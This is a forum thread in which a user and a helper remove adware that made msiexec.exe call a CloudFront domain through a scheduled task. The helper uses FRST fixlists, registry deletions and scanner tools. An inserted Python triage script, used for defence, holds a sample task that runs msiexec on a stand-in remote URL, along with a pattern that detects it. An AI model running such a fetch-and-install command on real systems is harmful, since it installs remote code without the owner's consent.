
HOW TO REMOVE [msiexec d2buh1bf1g584w.cloudfront.net]


  • This topic is locked
13 replies to this topic

#1 Geman

Geman

  • Members
  • 8 posts
  • OFFLINE
  • Local time:05:14 AM

Posted 19 April 2017 - 03:25 AM

Hi guys, I am George.

Recently I have had several problems with many adware and malware viruses. MIO.exe, QQ browser, Winsnare, WinSap. Fake browsers, Kuyeby.exe, Kitty, Snarer.dll, Chromium, and others.

I have used many programs to successfully clean my laptop.

Zemana, HitmanPro, Malwarebytes, Eset online scanner, Roguekiller, Adware removal tool by TSA, AdwCleaner, Norton Security, Junk removal tool.

Although these programs did a great job, I still have the same problem with one thing.

Every day, several times, Malwarebytes antimalware blocks the same website: d2buh1bf1g584w.cloudfront.net

This domain is trying to connect through msiexec.exe.

I have scanned again and again with the above programs with no result.

Everything clean...

Can you help me? Thank you

 

Attached File  FRST_19-04-2017 11.01.31.txt   124.06KB   4 downloads

 

Attached File  Addition_19-04-2017 11.01.31.txt   45.01KB   3 downloads

 

Attached File  MBAM.txt   616bytes   2 downloads

 

 




 


#2 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  • Local time:05:14 AM

Posted 19 April 2017 - 10:10 AM

UPDATE

I think I have found the problem...

In the Task Scheduler I discovered a task named WINICH. This task has been programmed to connect with the malicious domain d2buh1bf1g584w.cloudfront.net 3 or 4 times a day.

I deleted the above task and now I am waiting to see if this domain will try again to connect through msiexec.exe.

I also looked at the registry keys and found these malicious keys:

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Moncar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Antanna
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Alltie

These keys are connected with the above domain. Of course I deleted them.

But I cannot find the key for the WINICH task.

My Task Scheduler is corrupted.
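A triage sketch for the kind of persistence described in post #2, added here as an example and not part of the original thread: it parses Task Scheduler XML definitions (the files under %SystemRoot%\System32\Tasks, or an offline copy of that folder) and reports Exec actions that pass msiexec an http(s) URL. That the task called msiexec with a URL argument is an assumption; the sample task, the function names and the example.invalid URL are constructed.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Namespace used by Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample, not taken from the thread: a task whose action hands
# msiexec a remote package. Host, path and schedule are placeholders.
SAMPLE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger><StartBoundary>2017-04-19T08:00:00</StartBoundary></TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\msiexec.exe</Command>
      <Arguments>/i http://cdn.example.invalid/setup.msi</Arguments>
    </Exec>
  </Actions>
</Task>"""


def remote_msiexec_actions(task_xml):
    """Return (command, url) pairs for Exec actions that give msiexec a URL.

    task_xml is the text or raw bytes of a single task definition.
    """
    root = ET.fromstring(task_xml)
    hits = []
    for exec_node in root.findall("./t:Actions/t:Exec", NS):
        command = (exec_node.findtext("t:Command", "", NS) or "").strip().strip('"')
        arguments = exec_node.findtext("t:Arguments", "", NS) or ""
        # Compare only the file name so full paths and odd casing still match.
        image = re.split(r"[\\/]", command)[-1].lower()
        if image not in ("msiexec", "msiexec.exe"):
            continue
        for url in URL_RE.findall(arguments):
            hits.append((command, url))
    return hits


def scan_task_folder(folder):
    """Walk a copy of the Tasks folder; map each flagged file to its findings."""
    findings = {}
    for path in Path(folder).rglob("*"):
        if not path.is_file():
            continue
        try:
            hits = remote_msiexec_actions(path.read_bytes())
        except ET.ParseError:
            # A damaged definition is reported too, since it needs a manual look.
            findings[str(path)] = "unparseable task definition"
            continue
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for command, url in remote_msiexec_actions(SAMPLE_TASK):
        print(f"msiexec launched with remote package: {command} -> {url}")
```

Run `scan_task_folder` against a copy of the Tasks folder taken from the affected machine; task files have no extension and are normally UTF-16, which the parser handles when given the raw bytes.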



#3 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 20 April 2017 - 08:30 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
GroupPolicy: Restriction - Chrome <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Toolbar: HKU\S-1-5-21-2168158248-878123262-2501458908-1001 -> No Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -  No File
Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  No File
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.9.1.12\Exts\Chrome.crx [2017-04-14]
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.9.1.12\Exts\Chrome.crx [2017-04-14]
U3 idsvc; no ImagePath
Task: {00A2DD07-9B1F-4375-A7D4-C51039FD5B98} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
Task: {00D31C53-5FE5-48D4-BB1B-02CDF9C02A47} - \Microsoft\Windows\Media Center\OCURActivate -> No File <==== ATTENTION
Task: {088482FA-65B8-4E17-9ABF-1DCD48E8D373} - \Microsoft\Windows\Tcpip\IpAddressConflict1 -> No File <==== ATTENTION
Task: {09F06BFE-A3C8-40E3-846A-6E6F4000C238} - \Microsoft\Windows\Tcpip\IpAddressConflict2 -> No File <==== ATTENTION
Task: {107D8345-4EC1-4995-A22E-1B10850BC24A} - \Adobe Acrobat Update Task -> No File <==== ATTENTION
Task: {15A7D09B-C6B4-4010-91EF-9468999EDFB6} - \Safer-Networking\Spybot Anti-Beacon\Refresh Anti-Beacon immunization -> No File <==== ATTENTION
Task: {1A13DA37-21EF-4EAE-90DC-3EBE77B8D0E5} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
Task: {1B8D9D0F-B4EF-43FB-A5E5-84C8967C1D76} - \Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate -> No File <==== ATTENTION
Task: {1CBB6F9B-9D44-46C2-B99C-8B345933CABC} - \Microsoft\Windows\Media Center\OCURDiscovery -> No File <==== ATTENTION
Task: {1EE2770A-FDE2-4D6D-B61A-D6CB72C090EE} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {1FB3E0A4-5A1D-4DBB-BA62-8B9931D4D22C} - \Microsoft\Windows\Media Center\DispatchRecoveryTasks -> No File <==== ATTENTION
Task: {215835B5-244A-49AF-AB53-1774E122EF1B} - \Microsoft\Windows\SideShow\SessionAgent -> No File <==== ATTENTION
Task: {21ED0DF8-B69C-4766-B54B-ED170AA67C4E} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {2701095E-E69B-4862-A7C0-CD92ED90F4D3} - \Microsoft\Windows\Media Center\mcupdate -> No File <==== ATTENTION
Task: {2C256DCE-1482-4A45-BBF9-D38267C291EA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {2C2BFF78-B887-4F37-ABA7-9E97397769AC} - \Microsoft\Windows\Media Center\RecordingRestart -> No File <==== ATTENTION
Task: {32B2285E-98E2-41BD-9678-134BD6AADFDD} - \Winich -> No File <==== ATTENTION
Task: {36A9158D-4B25-4443-9EAE-D784BAB9CAFC} - \Norton Identity Safe\Norton Error Analyzer -> No File <==== ATTENTION
Task: {3B006AFB-D5DA-468C-8847-9C69328EA302} - \Microsoft\Windows\Media Center\ActivateWindowsSearch -> No File <==== ATTENTION
Task: {43699C97-724A-43A4-AD79-448BF4F67D57} - \Microsoft\Windows\Media Center\PeriodicScanRetry -> No File <==== ATTENTION
Task: {4520E8A9-AF06-4122-859B-E4B655B29B36} - \Microsoft\Windows\AppID\SmartScreenSpecific -> No File <==== ATTENTION
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - \Microsoft\Windows\Shell\WindowsParentalControlsMigration -> No File <==== ATTENTION
Task: {49F8BC27-042C-4EDE-AE68-2D190244D464} - \Microsoft\Windows\SideShow\AutoWake -> No File <==== ATTENTION
Task: {4EFD8FC0-50B7-4F00-89D0-CCFAE97AF79E} - \Microsoft\Windows\UpdateOrchestrator\Maintenance Install -> No File <==== ATTENTION
Task: {4FDB1366-FFE7-448F-B82D-8249BFD307E0} - \{ABF97A73-625E-4AEE-BC90-42F4FEA7A402} -> No File <==== ATTENTION
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff -> No File <==== ATTENTION
Task: {5482819A-7043-4E6F-ACBC-8D42034EFFE2} - \Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler -> No File <==== ATTENTION
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - \Microsoft\Windows\Shell\WindowsParentalControls -> No File <==== ATTENTION
Task: {5C7E0020-DA0F-45B2-A072-F700189AEE54} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {606BC79E-CB09-4DCF-B76C-5D9006CF7CE3} - \Microsoft\Windows\Media Center\PBDADiscoveryW1 -> No File <==== ATTENTION
Task: {64B66932-2B95-4C07-991E-60F5A08591E2} - \Microsoft\Windows\Media Center\PBDADiscovery -> No File <==== ATTENTION
Task: {6830F183-F9C0-47C7-A46B-47158CEDFA7D} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {6A20BA58-946D-46B2-B804-224797D7279D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {6B105B39-E4E6-4339-B7B5-A2D5D0E301AA} - \Microsoft\Windows\Media Center\mcupdate_scheduled -> No File <==== ATTENTION
Task: {700F0C97-8E21-4FC3-BC3A-838A840FF8F5} - \Microsoft\Windows\Media Center\InstallPlayReady -> No File <==== ATTENTION
Task: {7BEE4076-876E-488E-8BBD-6BE6A60DCD69} - \Microsoft\XblGameSave\XblGameSaveTaskLogon -> No File <==== ATTENTION
Task: {7D0E6C2A-D333-4BBC-B5AC-F6CF1C25301B} - \Application Starter - f1375f225883e83d52e8db9690775c3c -> No File <==== ATTENTION
Task: {7F3E34E8-D0F5-4883-A60D-CC66A6050846} - \Microsoft\Windows\Media Center\UpdateRecordPath -> No File <==== ATTENTION
Task: {844548E0-1F77-41E6-9E46-750DEA8299D8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {893895E8-BE49-4C38-860B-173432F7E571} - \WPD\SqmUpload_S-1-5-21-2168158248-878123262-2501458908-1001 -> No File <==== ATTENTION
Task: {92CBB1DE-6201-47E7-A7D2-ADF725C4E690} - \Microsoft\Windows\MobilePC\HotStart -> No File <==== ATTENTION
Task: {97E4587B-460B-4DC0-8B75-616071F648B8} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
Task: {99CFD3CB-9A54-468D-B1CB-04D7ECBF242E} - \Microsoft\Windows\Media Center\PBDADiscoveryW2 -> No File <==== ATTENTION
Task: {9C51C232-C204-44CA-90F7-0C99F901DABD} - \Microsoft\Windows\Media Center\RegisterSearch -> No File <==== ATTENTION
Task: {A3CC9455-3D5E-4476-9A0B-BC6F46C7245E} - \Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate -> No File <==== ATTENTION
Task: {A8818506-BEE0-42FE-B41E-8220B624F5B4} - \Microsoft\Windows\SideShow\SystemDataProviders -> No File <==== ATTENTION
Task: {AE007377-521E-40F1-8EFC-05021EF000AE} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
Task: {AF8ACBC5-FA84-4E1B-AC15-B8360A75ECDB} - \Microsoft_MKC_Logon_Task_itype.exe -> No File <==== ATTENTION
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor -> No File <==== ATTENTION
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6 -> No File <==== ATTENTION
Task: {B3D9FBDC-A7EB-4009-B0A9-2AE9E5650711} - \Microsoft_MKC_Logon_Task_ipoint.exe -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1 -> No File <==== ATTENTION
Task: {C9ACBFD2-20AA-4A3F-BE1A-A3D5279BB1BB} - \Microsoft\Windows\Plug and Play\Plug and Play Cleanup -> No File <==== ATTENTION
Task: {C9E38EB9-ECC2-4FC9-8091-AB9673813CDC} - \Microsoft\Windows\UpdateOrchestrator\MusUx_UpdateInterval -> No File <==== ATTENTION
Task: {CC7B0A33-97F3-4E2D-B7DD-356D76C8D382} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {D09D2922-C054-47B9-8ECA-8C0B948C586F} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {D0D1A385-513C-4090-A252-853FCB94BA6B} - \Norton WSC Integration -> No File <==== ATTENTION
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork -> No File <==== ATTENTION
Task: {E3EDCFE7-BB39-4EF1-B4B5-F77E12236839} - \Microsoft\Windows\Media Center\PvrRecoveryTask -> No File <==== ATTENTION
Task: {E57FF741-24D4-49FF-B022-5953935AB770} - \Adobe Flash Player Updater -> No File <==== ATTENTION
Task: {E6D32E6F-5646-4B2B-97E9-770100246A5B} - \Microsoft\Windows\Media Center\ehDRMInit -> No File <==== ATTENTION
Task: {EACA24FF-236C-401D-A1E7-B3D5267B8A50} - \Microsoft\Windows\RAC\RacTask -> No File <==== ATTENTION
Task: {EC6EAF10-A6C3-49B6-91D1-6603006DE224} - \Norton Identity Safe\Norton Error Processor -> No File <==== ATTENTION
Task: {F8D34E23-3575-4BF4-AC82-A61BE9349137} - \Microsoft\Windows\Media Center\ReindexSearchRoot -> No File <==== ATTENTION
Task: {F8D615B2-5E9B-46F0-B8C6-CCF55821DFC0} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
Task: {F951535D-88B7-4D4C-BA41-B7D14F2CDC9A} - \Microsoft\Windows\SideShow\GadgetManager -> No File <==== ATTENTION
Task: {FA4107F7-8195-422C-AF93-0DA959EA7308} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {FC715683-5AA8-41BE-8B25-34866E49BF1C} - no filepath
Task: {FEDA352E-93A3-487D-BEC7-64A74543BF17} - \Microsoft\Windows\Media Center\ConfigureInternetTimeService -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\7z1602-x64.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Adware Removal Tool by TSA.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\appmanagersetup_2.0_b4_292(1).exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\drivermax_9_26_cnet.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\DriverTalent_setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\driver_booster_setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\esetonlinescanner_enu.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\ExcelViewer.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Firefox Setup Stub 52.0.2 (1).exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\flashplayer21_xa_install.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\freac-1.0.26.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\hitmanpro_x64.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\mb3-setup-consumer-3.0.6.1469-10103.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\msert.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\NPE.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\revosetup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\vlc-2.2.4-win32.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Zemana.AntiMalware.Portable.exe:BDU [0]
C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

If the problem persists run this search.

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 3 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7 users need to right click and choose Run as Admin
You only need to get one of them to run, not all of them.

rkill.exe
rkill.com
rkill.scr

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested on another computer and then transfer them to the desktop of the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

When completed it will create a log. Please post the content on your next reply.
===

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a window opens to explain what [PUM's] are, read about it.
  • Click the RogueKiller icon on your taskbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next reply.
=======


Please post the logs and let me know what problem persists with this computer.

#4 Geman


Posted 20 April 2017 - 11:23 AM

Hi nasdaq,

Thank you for your help.

The domain d2buh1bf1g584w.cloudfront.net is not trying to connect anymore.

It seems that after deleting the task and the above keys, which were connected, it stopped.

The malware Winich is not there. There is no registry key.

My Task Scheduler is better than before, but not perfect.

Several errors occur when I am trying to open for the first time or when I am opening specific tasks.

 

Attached File  Fixlog.txt   43.44KB   1 downloads

 

Attached File  Rkill.txt   4.97KB   1 downloads

 

Attached File  ReportRogue.txt   2.95KB   1 downloads

 



#5 nasdaq


Posted 21 April 2017 - 07:18 AM

"My Task Scheduler is better than before, but not perfect.
Several errors occur when I am trying to open for the first time or when I am opening specific tasks"


Some tasks may be corrupted or no longer referencing the program.

The Registry key may be damaged.

Refer to this article
https://support.microsoft.com/en-us/help/2305420/ms10-092-vulnerability-in-task-scheduler-could-allow-for-elevation-of-privilege
Step 1: Locate the corrupted task references in the registry and in Task Scheduler

Any sign of unwanted task(s)?

Before you make any change to the Registry, make sure you have a good registry backup.
https://support.microsoft.com/en-us/help/322756/how-to-back-up-and-restore-the-registry-in-windows

Keep me posted.

#6 Geman


Posted 22 April 2017 - 03:24 AM

Until now I see no sign of unwanted tasks.

Now, when I expand the Library tree I can see all of the tasks that are in use. Before I couldn't see anything.

Only a few errors:


Adobe flash player updater-"The task no longer exists"
ErrorDetailsUpdate-"The task no longer exists"
UpdateRecordPath-"The version of the work item is unsupported or invalid"
PBDADiscoveryW1-"The version of the work item is unsupported or invalid"
ObjectStoreRecoveryTask-"The version of the work item is unsupported or invalid"
ConfigureInternetTimeService-"The version of the work item is unsupported or invalid"



#7 nasdaq


Posted 22 April 2017 - 08:34 AM

Let's see what this key will report.

SystemLook.exe
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe to run it.
  • Copy and paste the content of the following bold text into the main textfield:
    :reg
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree /sub
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.


#8 Geman


Posted 22 April 2017 - 08:57 AM

Here is the log

Attached File  SystemLook.txt   532.46KB   1 downloads



#9 nasdaq


Posted 22 April 2017 - 10:42 AM

Create a system restore point
https://support.microsoft.com/en-ca/instantanswers/e6bbddb0-9db4-4d88-9063-42c52c79a96e/create-a-system-restore-point

Then run this .reg file to remove the offending entries.

Copy the text IN THE QUOTE BOX below to Notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "all files". Once you have saved it, right-click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\UpdateRecordPath]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PBDADiscoveryW1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ConfigureInternetTimeService]


Restart the computer when completed.

You can delete the fixme.reg file when done.

How is it now?

#10 Geman


Posted 23 April 2017 - 03:30 AM

Now it is fine. No error.

Thank you

A few days ago the language bar disappeared and I couldn't type in the Windows search bar, but I made some changes in the registry key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "ctfmon"="CTFMON.EXE"

and now it's fine, although it's different than before.



#11 nasdaq


Posted 23 April 2017 - 08:20 AM


In Windows 10 this is controlled by this setting

https://superuser.com/questions/963978/language-bar-missing

---

How were the Registry entries set before you changed them?

#12 Geman


Posted 23 April 2017 - 08:35 AM

Yes, now it's there.

The registry entry was simply CTFMON.EXE



#13 nasdaq


Posted 23 April 2017 - 08:44 AM

I just checked my Windows 10 and the Run "ctfmon"="CTFMON.EXE" is not present.

I do have the Language bar on the TaskBar.

If you need additional advice on this issue, check with the Windows 10 Experts.
https://www.bleepingcomputer.com/forums/f/229/windows-10-support/
===

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

#14 Geman


Posted 23 April 2017 - 08:55 AM

Thank you very much for your help and your advice.





